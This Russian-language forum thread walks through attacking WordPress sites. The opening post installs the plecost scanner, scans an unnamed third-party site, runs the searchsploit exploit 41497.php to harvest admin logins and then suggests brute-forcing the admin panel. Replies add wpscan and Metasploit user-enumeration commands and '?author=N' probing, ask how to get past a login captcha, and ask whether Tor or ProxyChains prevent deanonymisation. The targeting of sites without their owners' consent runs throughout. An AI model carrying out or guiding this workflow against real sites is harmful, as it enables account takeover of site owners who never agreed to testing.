Ищем уязвимости в WordPress с помощью plecost

Inject0r

Well-known member
03.09.2016
114
173
#1
Всем привет!

Сегодня потестируем сканер безопасности Wordpress под названием plecost и проэксплуатируем одну небольшую уязвимость.

plecost по умолчанию установлен в kali, но почему-то совсем не обновляется и имеет версию аж 0.2.2-9-beta.

Устанавливаем утилиту:

apt-get update
apt-get install python3-pip
python3 -m pip install plecost
cd /usr/bin/
rm plecost
ln -s /usr/local/bin/plecost plecost

Убеждаемся, что у нас установилась свежая версия 1.1.1:

plecost

55.jpg

Сканируем сайт с движком на WordPress:

plecost <Домен>

Я произвел сканирование одного случайного сайта на Wordpress, ссылку на который умышленно давать не буду.

Какую информацию дает на выходе утилита:
- версия WordPress и список ее уязвимостей;
- список установленных плагинов, их версии и уязвимости.

В моем примере был найден движок версии 4.5.0 с объемным списком дыр. А вот установленные плагины оказались безопасными.

1.jpg

Что делать дальше?

1. Можно пробить все найденные уязвимости на
Для просмотра контента необходимо: Войти или зарегистрироваться


Например, эксплойт для уязвимости CVE-2016-6897 может выполнить DoS-атаку. Правда для его выполнения необходимо знать логин/пароль от админки.
4.jpg

2. Можно поискать уязвимости в локальной базе Kali через searchsploit

Обновляем базу:

searchsploit --update

Ищем уязвимости для WordPress, исключаем из поиска уязвимости для плагинов и тем, так как в данном примере дыры не найдены:

searchsploit wordpress | grep -v Plugin | grep -v Theme

Изучив результаты видим, что для нашей версии 4.5.0 подходит эксплойт Username Enumeration. Давайте его запустим и найдем все логины!

66.jpg

Копируем эксплойт на рабочий стол:

cd ~/Desktop
cp /usr/share/exploitdb/platforms/php/webapps/41497.php ~/Desktop/

Удаляем виндовый символ перевода каретки, иначе скрипт выдаст ошибку:
cat 41497.php | tr -d '\r' > exploit.php

Открываем exploit.php в редакторе.

В первой строчке исправляем ошибку: добавляем после ! знак /
Далее, переменной url задаем значение с доменом сайта жертвы. После домена обязательно ставим /, иначе скрипт откажется работать.

77.jpg

Сохраняем изменения и запускаем:

chmod +x exploit.php
./exploit.php

3.jpg

В результате мы получаем список логинов для админки WP. Ура! Дальше можно в дело пускать брут :)

Это моя первая статья, надеюсь, что кому-нибудь она будет полезна :)
 
Последнее редактирование:

ghostphisher

гарант codeby
Gold Team
07.12.2016
2 170
2 487
#2
Для вордпресса можно псомотреть логины без скачивания эксплоитов, через впскан.

wpscan --url site.com --enumerate u и он покажеи и id и логин.
 

sunwayru

New member
21.07.2017
1
0
#3
Спасибо! Логины знаем, в вход на сайт защищён капчей, что порекомендуете?
 

Inject0r

Well-known member
03.09.2016
114
173
#5
Для вордпресса можно псомотреть логины без скачивания эксплоитов, через впскан.

wpscan --url site.com --enumerate u и он покажеи и id и логин.
Можно и так) Но крутые хакеры легких путей не ищут :)
[doublepost=1503931350,1503927412][/doublepost]Кстати, упустил момент. По умолчанию прога брутит плагины по словарю размером в 50 наименований. У нее есть словарь на 1000 плагинов, чтобы его использовать, нужно ввести команду:

plecost <домен> -w plugin_list_1000.txt
 

IioS

Red Team
09.06.2017
222
394
#6
К определению что это WP вот крутой плагин который, меня не раз помогал
Для просмотра контента необходимо: Войти или зарегистрироваться
(Только для мозилы, отображается возле значка обновления)
 

Вложения

  • 5.6 КБ Просмотры: 26

Breed

Well-known member
18.06.2017
215
240
#7
Для вордпресса можно псомотреть логины без скачивания эксплоитов, через впскан.
Плюс к этому в Metasploit:
  • модуль для определения версии: auxiliary/scanner/http/wordpress_scanner;
  • модуль для определения имени пользователя: auxiliary/scanner/http/wordpress_login_enum.
А я когда-то, не будучи еще знакомым с Kali и Linux-ом вообще, вручную перебирал в адресной строке:
Код:
http://ИМЯ_САЙТА.ru/?author=1
http://ИМЯ_САЙТА.ru/?author=2
http://ИМЯ_САЙТА.ru/?author=3
....................
http://ИМЯ_САЙТА.ru/?author=N
и вычислял цель вручную (ху из ху).
 

SlipX

dd if=/dev/random of=/dev/port
Премиум
13.08.2017
122
145
#8
давно это было)
А я когда-то, не будучи еще знакомым с Kali и Linux-ом вообще, вручную перебирал в адресной строке:
Код:
http://ИМЯ_САЙТА.ru/?author=1
http://ИМЯ_САЙТА.ru/?author=2
http://ИМЯ_САЙТА.ru/?author=3
....................
http://ИМЯ_САЙТА.ru/?author=N
и вычислял цель вручную (ху из ху).
 

Shellmell

New member
06.09.2017
2
0
#9
Подскажите, пожалуйста, насколько удобно и целесообразно делать это все под виндой?
 

MIKS

New member
04.12.2017
1
2
#10
Подскажите, пожалуйста, насколько удобно и целесообразно делать это все под виндой?
Очень неудобно. В любом случае, если опыта мало, Вы можете скачать дистрибутив Kali Linux для виртуальной машины отсюда:
Для просмотра контента необходимо: Войти или зарегистрироваться
 

Sykes

Well-known member
17.10.2017
91
56
#12
вообще не представляю как под виндой такое делать
Если человек убежденный мазохист и есть мазь от геморроя, то можно поставить нужные зависимости и работать. Но это правда жесть..
 
Симпатии: Понравилось HtOnion

HtOnion

Red Team
06.11.2017
443
570
#13
Если человек убежденный мазохист и есть мазь от геморроя, то можно поставить нужные зависимости и работать. Но это правда жесть..
Да это реально мазахизм, там от командной строки только нервный срыв поймать можно
 
Симпатии: Понравилось Sykes

Sykes

Well-known member
17.10.2017
91
56
#14
Спасет ли от деанона Тор и ProxyChains или придется мучиться внутри программы?
 

Night Hunter

Премиум
13.01.2018
157
104
#16
wpscan --url site.com --enumerate u и он покажеи и id и логин.
Из личного опыта могу сказать, что не всегда...Если установлены плагины для защиты админки и настроены правильно, то он не покажет юзеров + он также может даже плагинов не найти)